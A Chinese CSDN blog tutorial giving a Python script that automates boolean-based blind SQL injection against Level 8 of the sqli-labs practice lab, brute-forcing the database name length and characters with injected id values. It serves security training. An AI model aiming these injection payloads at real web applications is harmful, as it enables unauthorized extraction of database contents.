sqli-labs靶场自动化利用工具——第8关

已于 2024-09-11 18:01:44 修改
阅读量259 收藏
点赞数 14
分类专栏: Sqli-Labs靶场自动化利用工具 文章标签: 自动化 网络安全 sql python
于 2024-09-11 17:55:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNagk1/article/details/142146562
版权

文章目录

概要

Sqli-Labs靶场对于网安专业的学生或正在学习网安的朋友来说并不陌生,或者说已经很熟悉。那有没有朋友想过自己开发一个测试脚本能实现自动化化测试sqli-labs呢?可能有些人会说不是有sqlmap,那我们又何须使用这个小脚本呢?这里我统一回答,sqlmap只是一个工具,工具始终是不能代替人的思考。开发这个测试的脚本他都是有针对性的,他是针对每一关的精心设计。但凡脱离实际都是在空想。我也是一直围绕这个主题,所以想到了开发能自动化测试sqli-labs靶场每一关的POC。最后这个只能用于有基础的网安人进行学习,学习网安路还是不能投机取巧的。

本章适合人群:

  1. 网安专业学生
  2. 报班学习网安内容的同学
  3. 提高写POC能力的网安从业者

整体架构流程

因为是sqli-labs的第8关,且我觉得名字很是麻烦,所以我在写脚本的时候错将sqli-labs写成了sql-libs请见谅。如果你有强迫症可以自行修改。

整体流程主要是仿爬虫的形式访问网页,但第8关有所不同的点是他需要类似爆破的操作。

且我没有对上面的数据库最大长度进行安全校验,这个是这个代码最大的漏洞。

有兴趣的小伙伴可以自行添加。

技术细节

import re
import requests

headers = {
    'Host': 'sql:8081',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'Priority': 'u=0, i'
}

pattern = r"You are in\.*"

url = 'http://sql:8081'

def brute_dblength():
    try:
        # 获取用户输入的最大长度
        max_dblength = int(input('数据库可能长度:').strip())
    except ValueError:
        print("请输入一个有效的数字")
        return None

    dblength = 1
    while dblength <= max_dblength:
        params = {
            'id': f"1' and length(database())={dblength}-- -"
        }
        try:
            response = requests.get(url + "/Less-8/", headers=headers, params=params, verify=False)
            html_content = response.text
            match = re.search(pattern, html_content)
            if match:
                print(f'{url} 存在漏洞,数据库长度为 {dblength}')
                return dblength
            else:
                dblength += 1
        except requests.RequestException as e:
            print(f'Error scanning {url}: {e}')
            return None

    print(f'数据库长度大于 {max_dblength},请尝试增加最大长度。')
    return None

def brute_dbname(dblength):
    dict_list = []
    for option1 in range(1, dblength + 1):
        found = False
        for number1 in range(97, 123, 1):  # 小写字母a-z
            params = {
                'id': f"1' and ascii(substr((select database()),{option1},1))={number1}-- -"
            }
            try:
                response = requests.get(url + "/Less-8/", headers=headers, params=params, verify=False)
                html_content = response.text
                match = re.search(pattern, html_content)
                if match:
                    print(f'{url} 存在漏洞,数据库第 {option1} 个字母对应的ASCII码为 {number1}')
                    dict_list.append(chr(number1))  # 将ASCII码转换为字符并添加到列表中
                    found = True
                    break  # 找到字符后跳出内层循环,检查下一个位置
            except requests.RequestException as e:
                print(f'Error scanning {url}: {e}')
                return None
        if not found:
            print(f'数据库名称的第 {option1} 个字符未找到匹配。')
            return None

    dbname = ''.join(dict_list)
    print(f'数据库名称为: {dbname}')
    return dbname


# 获取数据库名称长度
dblength = brute_dblength()
if dblength:
    # 利用数据库名称长度进一步获取数据库名称
    brute_dbname(dblength)

执行效果

小结

由于我的sqli-labs靶场是搭建在我的本机,所以使用代码时需要进行修改。

且想输出不一样的文件内容格式,也可以进行微调整。

最后还是那句话网安的路上不会一帆风顺,还需脚踏实地一步一个脚印的前行,仅用于POC的学习使用,其他使用与作者无关。

转瞬都有
关注
  • 14
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-labs靶场第8详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1131
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
攻防系列——pikachu靶场练习
weixin_43140411的博客
10-23 2025
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
sqli-labs-master靶场搭建以及报错解决
qq_53058639的博客
04-14 1627
一.前提准备1.下载:sqli-labs-master。2.安装PHP study。二.搭建靶场1.启动phpstudy。2.将sqli-labs-master.zip解压到phpstudy_pro\WWW,为访问方便我这将其更名为sqli。3.打开我们的sqli。4.在url中的localhost后输入/sqli即可成功进入。5.到这一步,我们的sqli已经搭建成功,此时我们点击发现出错了。三.问题解决。
SQL注入18】Sqli-labs靶场1~10思路解析及思考总结——针对GET请求的注入思路
Fighting_hawk的博客
05-11 5591
1. 本文从SQLi-labs前10出发,总结各个卡通过程的思路。 2. 涵盖了联合查询注入、报错注入、布尔盲注和延时盲注四种基本类型。 3. 对比分析了不同参数测试时的用意,以便明确我们的注入思路。 4. 这些卡暂未对输入参数进行过滤,对于采用了保护措施的程序,基本思路正确,也是有可能注入不了的。 .........
Web安全漏洞专项靶场SQL注入—docker环境—sqli-labs靶场—详细通指南
qq_38678845的博客
01-22 2156
Web安全SQL注入漏洞的专项训练
SQL注入-14】布尔盲注的半自动化注入案例—以sqli-labs-less8为例(利用BurpSuite工具
m0_64378913的博客
05-12 1620
目录1 概述2 布尔盲注的半自动化注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 爆库名长度及库名2.2.4 爆表名、字段名以及账户及密码3 总结参考文章 本博客内容仅供学习探讨,请勿滥用乱用 1 概述 当改变浏览器带入给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。 布尔盲注:一般情况下,当带入参数为真和假时,页面会有不同的反映,比如有无显示也是
靶场 SQLi-labs 的 1- 9
qq_46219965的博客
08-30 2393
靶场 SQLi-labs 的 1- 9
Sqli_labs通全解--总结
cyynid的博客
01-09 2192
Sqli_labs通全解
安全小记-sqli-labs闯
dzqxwzoe的博客
05-04 310
SQLI,sql injection,我们称之为sql注入。何为sql,英文:Structured QueryLanguage,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL,Oracle以及PostgresqlSql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1377
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 690
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
sql注入详解
m0_73109590的博客
08-03 1003
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
【南京工业大学主办,JPCS出版】自动化、电气控制系统与设备
weixin_55582706的博客
09-10 286
2024年自动化、电气控制系统与设备国际学术会议(AECSE 2024)将于2024年10月18-20日在中国南京举行。
机器人助力上下料搬运,加速仓库转运自动化
uwei0512的博客
09-07 410
近年来,国内制造业领域掀起了一股智能化改造的浪潮,众多工厂纷纷采纳富唯智能提供的先进物流解决方案,这一举措显著优化了生产流程,实现了生产效率的飞跃式增长。得益于这些成功案例,某信息技术服务企业在工厂智能物流建设的进程中,也选择了与富唯智能合作。
帮招一名海康VM机器视觉工程师,工作地:苏州园区,行业:智能仓储自动化巨头,VM可以二次独立开发,岁数35岁以下,薪资18K+
视觉人机器视觉的博客
09-07 348
帮招一名海康VM机器视觉工程师,工作地:苏州园区,行业:智能仓储自动化巨头,VM可以二次独立开发,岁数35岁以下,薪资18K+
智慧农业-自动化如何塑造农业的未来
2401_84119582的博客
09-06 1241
全球人口的增长和气候变化对农业生产的持续影响,传统农业面临非常大的考验。为了保证农业效率、减少资源浪费和应对环境破坏,智能农业(Smart Agriculture)已成为未来农业发展的键趋势。但在智能农业的诸多技术中,自动化是最键的推动力量之一。自动化如何改变农业?它又将如何营造农业的未来?
JAMA network open|自动化定量评估胃肠道肿瘤中三级淋巴结构的机器学习模型|文献精析·24-09-07
罗小罗同学的博客
09-07 986
这篇文章报道了一种基于机器学习模型的自动化方法,用于在常规组织病理学图像中检测和分类胃肠道癌症中的三级淋巴结构,并验证了其与患者生存预后的联。在这项多中心诊断/预后研究中,开发了一种基于机器学习的计算工具,用于自动化检测和定量评估常规H&E幻灯片上的TLSs,并证实了其在胃肠癌中的生存率联。提出的TLSs评分系统可能补充现有的分期系统,并在风险分层中发挥作用。未来的前瞻性验证研究可能会确认这些结果的重复性和广泛适用性。一作&通讯。
info_scan!自动化漏洞扫描系统,附下载链接
最新发布
TG_punkll的博客
09-10 354
多个红队HVV使用的 info_scan!自动化漏洞扫描系统,附下载链接
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

转瞬都有

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值